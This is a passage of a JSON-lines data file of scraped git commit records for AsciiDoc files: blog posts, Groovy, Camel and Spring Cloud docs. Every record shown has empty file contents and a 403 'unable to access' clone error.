'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95dd8d38c60bdda87876147736633a3c5e8343a1","subject":"Update 2016-04-02-Repos-converting-Hg-Git.adoc","message":"Update 2016-04-02-Repos-converting-Hg-Git.adoc","repos":"pwlprg\/pwlprg.github.io,pwlprg\/pwlprg.github.io,pwlprg\/pwlprg.github.io,pwlprg\/pwlprg.github.io","old_file":"_posts\/2016-04-02-Repos-converting-Hg-Git.adoc","new_file":"_posts\/2016-04-02-Repos-converting-Hg-Git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pwlprg\/pwlprg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4fd4ec2b4fba234c00f464ab16a68333371ed9f0","subject":"y2b create post Nvidia Shield Unboxing, First Look \\u0026 Test!","message":"y2b create post Nvidia Shield Unboxing, First Look \\u0026 Test!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-07-30-Nvidia-Shield-Unboxing-First-Look-u0026-Test.adoc","new_file":"_posts\/2013-07-30-Nvidia-Shield-Unboxing-First-Look-u0026-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9af5a3cb157f7e41a1130e103d2fb29243bd70c7","subject":"y2b create post Would You Wear This Thing In Public?","message":"y2b create post Would You Wear This Thing In Public?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-10-10-Would-You-Wear-This-Thing-In-Public.adoc","new_file":"_posts\/2017-10-10-Would-You-Wear-This-Thing-In-Public.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9cf1efba042375a58b48b1c4bfa86d29869b16c2","subject":"Page completed","message":"Page completed\n","repos":"kidaa\/incubator-groovy,alien11689\/incubator-groovy,sagarsane\/groovy-core,adjohnson916\/groovy-core,russel\/incubator-groovy,alien11689\/groovy-core,russel\/incubator-groovy,christoph-frick\/groovy-core,russel\/incubator-groovy,dpolivaev\/groovy,shils\/incubator-groovy,apache\/incubator-groovy,traneHead\/groovy-core,jwagenleitner\/groovy,nkhuyu\/incubator-groovy,yukangguo\/incubator-groovy,ebourg\/incubator-groovy,russel\/groovy,bsideup\/incubator-groovy,groovy\/groovy-core,paulk-asert\/incubator-groovy,PascalSchumacher\/incubator-groovy,paulk-asert\/incubator-groovy,alien11689\/incubator-groovy,alien11689\/groovy-core,shils\/groovy,alien11689\/groovy-core,adjohnson916\/incubator-groovy,rlovtangen\/groovy-core,adjohnson916\/groovy-core,pledbrook\/incubator-groovy,armsargis\/groovy,EPadronU\/incubator-groovy,guangying945\/incubator-groovy,alien11689\/incubator-groovy,PascalSchumacher\/incubator-groovy,mariogarcia\/groovy-core,bsideup\/incubator-groovy,graemerocher\/incubator-groovy,apache\/incubator-groovy,taoguan\/incubator-groovy,mariogarcia\/groovy-core,ebourg\/incubator-groovy,adjohnson916\/groovy-core,shils\/incubator-groovy,sagarsane\/incubator-groovy,tkruse\/incubator-groovy,pledbrook\/incubator-groovy,ebourg\/groovy-core,pickypg\/incubator-groovy,shils\/incubator-groovy,traneHead\/groovy-core,antoaravinth\/incubator-groovy,alien11689\/groovy-core,armsargis\/groovy,ChanJLee\/incubator-groovy,traneHead\/groovy-core,armsargis\/groovy,jwagenleitner\/incubator-groovy,apache\/incubator-groovy,jwagenleitner\/groovy,paulk-asert\/incubator-groovy,shils\/groovy,eginez\/incubator-groovy,sagarsane\/groovy-core,bsideup\/incubator-groovy,EPadronU\/incubator-groovy,gillius\/incubator-groovy,mariogarcia\/groovy-core,kidaa\/incubator-groovy,aim-for-better\/incubator-groovy,jwagenleitner\/incubator-groovy,fpavageau\/groovy,pickypg\/incubator-groovy,dpolivaev\/groovy,ChanJLee\/incubator-groovy,avafanasiev\/groovy,guangying945\/incubator-groovy,traneHead\/groovy-core,genqiang\/incubator-groovy,nobeans\/incubator-groovy,bsideup\/incubator-groovy,aim-for-better\/incubator-groovy,aaronzirbes\/incubator-groovy,ChanJLee\/incubator-groovy,rlovtangen\/groovy-core,nobeans\/incubator-groovy,christoph-frick\/groovy-core,jwagenleitner\/incubator-groovy,pickypg\/incubator-groovy,paplorinc\/incubator-groovy,russel\/groovy,adjohnson916\/groovy-core,taoguan\/incubator-groovy,i55ac\/incubator-groovy,guangying945\/incubator-groovy,samanalysis\/incubator-groovy,tkruse\/incubator-groovy,rlovtangen\/groovy-core,paulk-asert\/groovy,pickypg\/incubator-groovy,gillius\/incubator-groovy,alien11689\/groovy-core,ebourg\/incubator-groovy,nkhuyu\/incubator-groovy,fpavageau\/groovy,yukangguo\/incubator-groovy,adjohnson916\/incubator-groovy,paplorinc\/incubator-groovy,pledbrook\/incubator-groovy,paplorinc\/incubator-groovy,avafanasiev\/groovy,PascalSchumacher\/incubator-groovy,kenzanmedia\/incubator-groovy,adjohnson916\/groovy-core,samanalysis\/incubator-groovy,tkruse\/incubator-groovy,kenzanmedia\/incubator-groovy,christoph-frick\/groovy-core,nobeans\/incubator-groovy,genqiang\/incubator-groovy,graemerocher\/incubator-groovy,graemerocher\/incubator-groovy,gillius\/incubator-groovy,apache\/groovy,adjohnson916\/incubator-groovy,kenzanmedia\/incubator-groovy,upadhyayap\/incubator-groovy,ebourg\/groovy-core,fpavageau\/groovy,antoaravinth\/incubator-groovy,aaronzirbes\/incubator-groovy,paulk-asert\/groovy,jwagenleitner\/groovy,sagarsane\/incubator-groovy,bsideup\/groovy-core,sagarsane\/incubator-groovy,paulk-asert\/groovy,PascalSchumacher\/incubator-groovy,kenzanmedia\/incubator-groovy,EPadronU\/incubator-groovy,kidaa\/incubator-groovy,rabbitcount\/incubator-groovy,kidaa\/incubator-groovy,ebourg\/groovy-core,dpolivaev\/groovy,paulk-asert\/incubator-groovy,aaronzirbes\/incubator-groovy,samanalysis\/incubator-groovy,nkhuyu\/incubator-groovy,i55ac\/incubator-groovy,avafanasiev\/groovy,paplorinc\/incubator-groovy,rlovtangen\/groovy-core,sagarsane\/groovy-core,russel\/incubator-groovy,ChanJLee\/incubator-groovy,russel\/groovy,ebourg\/incubator-groovy,paulk-asert\/incubator-groovy,gillius\/incubator-groovy,taoguan\/incubator-groovy,upadhyayap\/incubator-groovy,rabbitcount\/incubator-groovy,rabbitcount\/incubator-groovy,taoguan\/incubator-groovy,EPadronU\/incubator-groovy,shils\/incubator-groovy,bsideup\/groovy-core,upadhyayap\/incubator-groovy,groovy\/groovy-core,mariogarcia\/groovy-core,bsideup\/groovy-core,shils\/groovy,yukangguo\/incubator-groovy,i55ac\/incubator-groovy,genqiang\/incubator-groovy,groovy\/groovy-core,jwagenleitner\/incubator-groovy,aim-for-better\/incubator-groovy,guangying945\/incubator-groovy,tkruse\/incubator-groovy,shils\/groovy,alien11689\/incubator-groovy,genqiang\/incubator-groovy,armsargis\/groovy,aaronzirbes\/incubator-groovy,apache\/incubator-groovy,dpolivaev\/groovy,yukangguo\/incubator-groovy,ebourg\/groovy-core,christoph-frick\/groovy-core,groovy\/groovy-core,jwagenleitner\/groovy,eginez\/incubator-groovy,apache\/groovy,groovy\/groovy-core,paulk-asert\/groovy,i55ac\/incubator-groovy,avafanasiev\/groovy,antoaravinth\/incubator-groovy,samanalysis\/incubator-groovy,pledbrook\/incubator-groovy,nobeans\/incubator-groovy,russel\/groovy,upadhyayap\/incubator-groovy,eginez\/incubator-groovy,adjohnson916\/incubator-groovy,apache\/groovy,apache\/groovy,sagarsane\/groovy-core,rlovtangen\/groovy-core,sagarsane\/groovy-core,graemerocher\/incubator-groovy,antoaravinth\/incubator-groovy,nkhuyu\/incubator-groovy,sagarsane\/incubator-groovy,christoph-frick\/groovy-core,aim-for-better\/incubator-groovy,mariogarcia\/groovy-core,eginez\/incubator-groovy,fpavageau\/groovy,PascalSchumacher\/incubator-groovy,rabbitcount\/incubator-groovy,ebourg\/groovy-core,bsideup\/groovy-core","old_file":"src\/spec\/doc\/invokedynamic-support.adoc","new_file":"src\/spec\/doc\/invokedynamic-support.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kidaa\/incubator-groovy.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0a2c917a1f67852c6d3a2af375a40b7755fe36f3","subject":"Update 2016-01-04-Functional-Rotterdam-5th-Edition.adoc","message":"Update 2016-01-04-Functional-Rotterdam-5th-Edition.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-01-04-Functional-Rotterdam-5th-Edition.adoc","new_file":"_posts\/2016-01-04-Functional-Rotterdam-5th-Edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eea10d7d325c989c35b5dd85cd874d3b4fdf6755","subject":"Update 2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","message":"Update 2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","new_file":"_posts\/2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b859087715f105a32cf4deb885f98703fb927ad7","subject":"Update 2016-12-25-NSUCRYPT-2016-RESULT.adoc","message":"Update 2016-12-25-NSUCRYPT-2016-RESULT.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-12-25-NSUCRYPT-2016-RESULT.adoc","new_file":"_posts\/2016-12-25-NSUCRYPT-2016-RESULT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d7849803680ccd8e1730c1e878e7d9bd2337633","subject":"y2b create post AVerMedia Game Capture HD Unboxing","message":"y2b create post AVerMedia Game Capture HD Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-09-AVerMedia-Game-Capture-HD-Unboxing.adoc","new_file":"_posts\/2011-12-09-AVerMedia-Game-Capture-HD-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6946dd7a029b0602176d5546c5ee69ce6b3af357","subject":"Update 2015-03-14-EmberJS-at-SRXP.adoc","message":"Update 2015-03-14-EmberJS-at-SRXP.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2015-03-14-EmberJS-at-SRXP.adoc","new_file":"_posts\/2015-03-14-EmberJS-at-SRXP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"918b41cd6f602899324f98274cce046d178fde55","subject":"Update 2019-01-31-Your-Blog-title.adoc","message":"Update 2019-01-31-Your-Blog-title.adoc","repos":"raytong82\/raytong82.github.io,raytong82\/raytong82.github.io,raytong82\/raytong82.github.io,raytong82\/raytong82.github.io","old_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raytong82\/raytong82.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a05a41f201285499e4269320ecd6e362bfbaa2a8","subject":"Added Xquery-language docs to Gitbook","message":"Added Xquery-language docs to Gitbook\n","repos":"akhettar\/camel,RohanHart\/camel,akhettar\/camel,w4tson\/camel,salikjan\/camel,akhettar\/camel,nicolaferraro\/camel,kevinearls\/camel,rmarting\/camel,sverkera\/camel,w4tson\/camel,adessaigne\/camel,jamesnetherton\/camel,sirlatrom\/camel,sirlatrom\/camel,snurmine\/camel,tdiesler\/camel,rmarting\/camel,adessaigne\/camel,nboukhed\/camel,pax95\/camel,sverkera\/camel,RohanHart\/camel,driseley\/camel,w4tson\/camel,snurmine\/camel,driseley\/camel,apache\/camel,pax95\/camel,onders86\/camel,scranton\/camel,davidkarlsen\/camel,veithen\/camel,acartapanis\/camel,zregvart\/camel,NickCis\/camel,gnodet\/camel,dmvolod\/camel,veithen\/camel,sirlatrom\/camel,tdiesler\/camel,CodeSmell\/camel,curso007\/camel,snurmine\/camel,mgyongyosi\/camel,acartapanis\/camel,jonmcewen\/camel,isavin\/camel,driseley\/camel,anoordover\/camel,neoramon\/camel,bgaudaen\/camel,Thopap\/camel,sabre1041\/camel,yuruki\/camel,tlehoux\/camel,allancth\/camel,gnodet\/camel,cunningt\/camel,RohanHart\/camel,pmoerenhout\/camel,jkorab\/camel,kevinearls\/camel,drsquidop\/camel,rmarting\/camel,curso007\/camel,drsquidop\/camel,jamesnetherton\/camel,lburgazzoli\/apache-camel,neoramon\/camel,RohanHart\/camel,tadayosi\/camel,Thopap\/camel,DariusX\/camel,zregvart\/camel,davidkarlsen\/camel,neoramon\/camel,lburgazzoli\/apache-camel,christophd\/camel,jamesnetherton\/camel,mgyongyosi\/camel,dmvolod\/camel,RohanHart\/camel,rmarting\/camel,pkletsko\/camel,mcollovati\/camel,bgaudaen\/camel,jonmcewen\/camel,ssharma\/camel,curso007\/camel,pax95\/camel,lburgazzoli\/camel,ullgren\/camel,ssharma\/camel,cunningt\/camel,yuruki\/camel,tdiesler\/camel,tkopczynski\/camel,akhettar\/camel,bgaudaen\/camel,pkletsko\/camel,sabre1041\/camel,RohanHart\/camel,acartapanis\/camel,kevinearls\/camel,tadayosi\/camel,snurmine\/camel,scranton\/camel,lburgazzoli\/apache-camel,jamesnetherton\/camel,anton-k11\/camel,akhettar\/camel,onders86\/camel,davidkarlsen\/camel,driseley\/camel,onders86\/camel,dmvolod\/camel,nboukhed\/camel,ssharma\/camel,jarst\/camel,w4tson\/camel,christophd\/camel,prashant2402\/camel,bhaveshdt\/camel,jonmcewen\/camel,cunningt\/camel,acartapanis\/camel,adessaigne\/camel,drsquidop\/camel,objectiser\/camel,allancth\/camel,anoordover\/camel,sverkera\/camel,jkorab\/camel,tkopczynski\/camel,anton-k11\/camel,drsquidop\/camel,sabre1041\/camel,lburgazzoli\/camel,kevinearls\/camel,neoramon\/camel,gilfernandes\/camel,veithen\/camel,gautric\/camel,jonmcewen\/camel,objectiser\/camel,tadayosi\/camel,pmoerenhout\/camel,gnodet\/camel,pax95\/camel,NickCis\/camel,driseley\/camel,jkorab\/camel,ssharma\/camel,jarst\/camel,nikhilvibhav\/camel,tkopczynski\/camel,tlehoux\/camel,hqstevenson\/camel,prashant2402\/camel,nboukhed\/camel,gnodet\/camel,snurmine\/camel,tlehoux\/camel,lburgazzoli\/camel,jamesnetherton\/camel,adessaigne\/camel,tlehoux\/camel,lburgazzoli\/camel,dmvolod\/camel,alvinkwekel\/camel,bhaveshdt\/camel,sverkera\/camel,drsquidop\/camel,lburgazzoli\/apache-camel,gnodet\/camel,tlehoux\/camel,anoordover\/camel,chirino\/camel,bgaudaen\/camel,DariusX\/camel,yuruki\/camel,jarst\/camel,zregvart\/camel,yuruki\/camel,apache\/camel,allancth\/camel,gautric\/camel,Fabryprog\/camel,ullgren\/camel,apache\/camel,gautric\/camel,nicolaferraro\/camel,gilfernandes\/camel,anoordover\/camel,prashant2402\/camel,apache\/camel,bhaveshdt\/camel,rmarting\/camel,acartapanis\/camel,Thopap\/camel,gilfernandes\/camel,anton-k11\/camel,alvinkwekel\/camel,prashant2402\/camel,mgyongyosi\/camel,jonmcewen\/camel,sirlatrom\/camel,chirino\/camel,hqstevenson\/camel,chirino\/camel,veithen\/camel,gautric\/camel,jkorab\/camel,alvinkwekel\/camel,apache\/camel,nikhilvibhav\/camel,jarst\/camel,anton-k11\/camel,tkopczynski\/camel,allancth\/camel,Thopap\/camel,davidkarlsen\/camel,tkopczynski\/camel,ssharma\/camel,anoordover\/camel,mcollovati\/camel,sverkera\/camel,Fabryprog\/camel,nicolaferraro\/camel,jkorab\/camel,kevinearls\/camel,pkletsko\/camel,lburgazzoli\/apache-camel,prashant2402\/camel,hqstevenson\/camel,allancth\/camel,pmoerenhout\/camel,acartapanis\/camel,scranton\/camel,ullgren\/camel,sabre1041\/camel,nboukhed\/camel,CodeSmell\/camel,prashant2402\/camel,tlehoux\/camel,onders86\/camel,mgyongyosi\/camel,christophd\/camel,isavin\/camel,driseley\/camel,sabre1041\/camel,hqstevenson\/camel,lburgazzoli\/apache-camel,punkhorn\/camel-upstream,pax95\/camel,onders86\/camel,anoordover\/camel,nicolaferraro\/camel,chirino\/camel,sabre1041\/camel,tdiesler\/camel,yuruki\/camel,ullgren\/camel,neoramon\/camel,CodeSmell\/camel,jarst\/camel,tadayosi\/camel,w4tson\/camel,dmvolod\/camel,nboukhed\/camel,w4tson\/camel,pkletsko\/camel,punkhorn\/camel-upstream,pax95\/camel,salikjan\/camel,akhettar\/camel,tdiesler\/camel,jkorab\/camel,tdiesler\/camel,chirino\/camel,pmoerenhout\/camel,DariusX\/camel,NickCis\/camel,yuruki\/camel,lburgazzoli\/camel,mcollovati\/camel,curso007\/camel,lburgazzoli\/camel,gilfernandes\/camel,isavin\/camel,bhaveshdt\/camel,NickCis\/camel,rmarting\/camel,scranton\/camel,curso007\/camel,veithen\/camel,pkletsko\/camel,bhaveshdt\/camel,scranton\/camel,DariusX\/camel,sirlatrom\/camel,tadayosi\/camel,isavin\/camel,tkopczynski\/camel,veithen\/camel,punkhorn\/camel-upstream,cunningt\/camel,christophd\/camel,bgaudaen\/camel,snurmine\/camel,neoramon\/camel,drsquidop\/camel,cunningt\/camel,mgyongyosi\/camel,onders86\/camel,jonmcewen\/camel,cunningt\/camel,adessaigne\/camel,apache\/camel,scranton\/camel,sverkera\/camel,ssharma\/camel,gilfernandes\/camel,Fabryprog\/camel,allancth\/camel,nikhilvibhav\/camel,zregvart\/camel,CodeSmell\/camel,gilfernandes\/camel,hqstevenson\/camel,nboukhed\/camel,anton-k11\/camel,kevinearls\/camel,pkletsko\/camel,sirlatrom\/camel,pmoerenhout\/camel,tadayosi\/camel,objectiser\/camel,isavin\/camel,mcollovati\/camel,christophd\/camel,bhaveshdt\/camel,NickCis\/camel,NickCis\/camel,hqstevenson\/camel,nikhilvibhav\/camel,dmvolod\/camel,adessaigne\/camel,Thopap\/camel,anton-k11\/camel,gautric\/camel,bgaudaen\/camel,jamesnetherton\/camel,mgyongyosi\/camel,curso007\/camel,pmoerenhout\/camel,objectiser\/camel,christophd\/camel,Thopap\/camel,chirino\/camel,isavin\/camel,gautric\/camel,jarst\/camel,alvinkwekel\/camel,Fabryprog\/camel,punkhorn\/camel-upstream","old_file":"components\/camel-saxon\/src\/main\/docs\/xquery-language.adoc","new_file":"components\/camel-saxon\/src\/main\/docs\/xquery-language.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"da07db33099870098962982e9929b4579ed0970f","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1456625a90f09a00437b30e673ada1b6d2bcf89","subject":"Update 2016-08-20-Trackpad-Woes.adoc","message":"Update 2016-08-20-Trackpad-Woes.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-08-20-Trackpad-Woes.adoc","new_file":"_posts\/2016-08-20-Trackpad-Woes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebedd426d3dcd648f7e4e058ba5305c0d796a82b","subject":"PLANNER-431: Add upgrade recipe archive","message":"PLANNER-431: Add upgrade recipe archive\n","repos":"oskopek\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"download\/upgradeRecipe\/upgradeRecipeArchive.adoc","new_file":"download\/upgradeRecipe\/upgradeRecipeArchive.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6a1f2f32f486a42bcd19f52f84ab0a239559071c","subject":"Update 2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","message":"Update 2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","new_file":"_posts\/2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91c069b05e5b6be2369b1c06c2cfa77557016590","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46d8c1d04938d1ce8f5858c5fe695520a73a14b7","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"975973fdde37ba9ca9c0a9505cb87dbd1ea3ff83","subject":"Update 2016-09-23-wtf-log.adoc","message":"Update 2016-09-23-wtf-log.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-23-wtf-log.adoc","new_file":"_posts\/2016-09-23-wtf-log.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"67b0f82e255eff7b879b9da4ece41ea2634c2283","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02acbd900e804536899f186b76ff6e3af45485d0","subject":"Update 2018-11-08-develop.adoc","message":"Update 2018-11-08-develop.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-develop.adoc","new_file":"_posts\/2018-11-08-develop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30ab353e9d8aafe8ae58f25e9278c79bd4c31166","subject":"y2b create post JBL Onbeat Venue LT Unboxing (Wireless Speaker for iPhone 5 \\u0026 More)","message":"y2b create post JBL Onbeat Venue LT Unboxing (Wireless Speaker for iPhone 5 \\u0026 More)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-28-JBL-Onbeat-Venue-LT-Unboxing-Wireless-Speaker-for-iPhone-5-u0026-More.adoc","new_file":"_posts\/2013-01-28-JBL-Onbeat-Venue-LT-Unboxing-Wireless-Speaker-for-iPhone-5-u0026-More.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53a3076e1c73a77f6ec2ff82552482539e346219","subject":"Add docs on turbine.combineHostPort","message":"Add docs on turbine.combineHostPort\n","repos":"sfat\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,jkschneider\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,sfat\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,jkschneider\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,jkschneider\/spring-cloud-netflix,jkschneider\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,sfat\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,sfat\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,sfat\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,jkschneider\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-netflix.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-netflix.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sfat\/spring-cloud-netflix.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a93fb512aafd91a17dc438b148d1411193c4617e","subject":"added who uses...","message":"added who 